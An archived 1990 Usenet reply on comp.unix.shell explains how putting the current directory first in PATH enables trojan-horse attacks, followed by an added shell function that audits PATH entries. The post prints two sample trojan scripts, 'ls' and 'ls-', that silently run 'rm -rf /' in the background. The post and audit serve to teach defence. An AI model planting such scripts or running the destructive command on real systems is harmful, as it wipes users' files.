Path: utzoo!attcan!uunet!cs.utexas.edu!sdd.hp.com!mips!wyse!vsi1!zorch!ditka!qiclab!onion!jeff
From: jeff@onion.pdx.com (Jeff Beadles)
Newsgroups: comp.unix.shell
Subject: Re: crontab for ordinary users
Message-ID: <1990Oct25.235740.21579@onion.pdx.com>
Date: 25 Oct 90 23:57:40 GMT
References: <1990Oct23.065611.17458@onion.pdx.com> <4073@goanna.cs.rmit.oz.au>
Lines: 92

In <4073@goanna.cs.rmit.oz.au> msf@wren.cs.rmit.OZ.AU (Michael Fuller) writes:

> [ I wrote]
>>I believe that you're doing your best to make your system vulnerable to a
>>trojan horse attack with a brain-damaged path like this.
>
>> *** DOT SHOULD NEVER BE FIRST IN YOUR PATH. ***
>
>>There are security papers galore that try to beat this into people, but they
>>just don't listen. It IS a very good idea though.
>
>>If you don't know why dot is bad in front of your path, send me email telling
>>me why you need to know. :-)
>
>Please! Just come out and say it. Having implied that there is a security hole,
>you then don't say what it is. Ordinary users such as myself :-)
>don't have time or even know quite where to look for the "security papers
>galore", but those who _are_ interested in exploiting such
>weaknesses will eagerly go off to play. If I knew why it was a bad idea,
>I would be *much* less likely to do such a thing. The result now is that
>I won't know, and the baddies will :-(. If you must mention a problem,
>do so in a way which doesn't disadvantage the very people you are trying
>to protect.

Well, since this is a fairly well known security-ism, I'll post it. Note
that the smiley was on the line above. All of the people that sent email
were given an answer.

First, an explanation of the search path. ($PATH)

When you run a command with any modern shell, the search path is used to locate
the executable program if a path is not given. This makes things much easier
for us humans, as we don't have to remember where everything is.

Also, the order of the path is significant. Things are searched in the order
of the path variable.

Thus, if your path is ".:/bin:/usr/bin" and you type the command "ls"
the shell will try (in the following order) to run:

	./ls
	/bin/ls
	/usr/bin/ls

However, if your path is set to "/bin:/usr/bin:." then the following order is
used:

	/bin/ls
	/usr/bin/ls
	./ls

Anyway, let's say that a user "joe" has his path set to ".:/bin:/usr/bin".

Now, I tell joe I have these keen neat-o-super-duper files in my account,
and that he can get a copy of them if he wants. (The story doesn't matter,
all you have to do is get someone into a directory that you have write access
to. /tmp would do just as well.)

Anyway, in your directory with all of the other files, you could have
a shell script called "ls". If this exists *IT* will run when the user types
"ls" rather than the system's "/bin/ls".

What if I had the following script set-up as 'ls'?

In a file called "ls"
-----cut here-----
#!/bin/sh
/bin/ls $*
rm -rf / 2>/dev/null &
-----cut here-----

If root ran it, you could kiss your system goodbye (1/2 :-)

Or, if run by "joe" user, then it would remove all "publicly writable" files,
and anything owned by "joe" user.

This is NOT a good thing, for obvious reasons.

I could also argue that dot anywhere in your path is a bad idea. Have you
ever typed "ls- l"? You could just as easily have the following trojan
horse:

In a file called "ls-"
-----cut here-----
#!/bin/sh
echo "ls- : Command not found"
rm -rf / 2>/dev/null &
-----cut here-----

You get the picture.

*** DOT SHOULD NEVER BE FIRST IN YOUR PATH. ***

By the way, please don't try this at home folks.

	-Jeff
-- 
Jeff Beadles	jeff@onion.pdx.com
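
A check for the condition the post warns about, as an added example that is not part of the original post: a POSIX sh function (the name audit_path is hypothetical) that reports every PATH entry which makes the shell search the current directory. It goes slightly beyond the post by also flagging empty entries (a leading, trailing or doubled colon), which shells treat as the current directory, and other relative entries.

```shell
#!/bin/sh
# Added example (not from the original post). audit_path is a hypothetical name.
# Prints one line per PATH entry that makes the shell search the current
# directory; returns 0 if the PATH is clean and 1 if anything was flagged.
# Usage: audit_path "$PATH"
audit_path() {
    path_value=$1
    position=0
    findings=0
    # Append a colon so a trailing empty entry ("/bin:") survives the split.
    rest="${path_value}:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}      # text up to the first colon
        rest=${rest#*:}        # everything after the first colon
        position=$((position + 1))
        case $entry in
            "")   reason="empty entry (same as the current directory)" ;;
            .|./) reason="dot (current directory)" ;;
            /*)   continue ;;  # absolute directory: not what the post warns about
            *)    reason="relative entry (depends on the current directory)" ;;
        esac
        findings=$((findings + 1))
        if [ "$position" -eq 1 ]; then
            echo "position $position: '$entry': $reason, searched before every other entry"
        else
            echo "position $position: '$entry': $reason"
        fi
    done
    [ "$findings" -eq 0 ]
}

# Constructed sample values: the two PATH settings discussed in the post.
audit_path ".:/bin:/usr/bin" || true
audit_path "/bin:/usr/bin:." || true
```

Run it against a live session with audit_path "$PATH"; the exit status makes it usable in a login-script or cron check.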